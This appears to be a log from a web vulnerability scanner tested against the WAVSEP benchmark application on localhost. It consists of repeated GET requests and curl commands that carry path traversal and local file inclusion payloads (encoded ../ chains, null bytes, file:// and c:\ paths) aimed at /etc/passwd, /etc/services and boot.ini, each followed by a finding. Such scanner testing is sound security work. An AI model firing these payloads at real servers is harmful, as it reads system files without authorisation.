GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
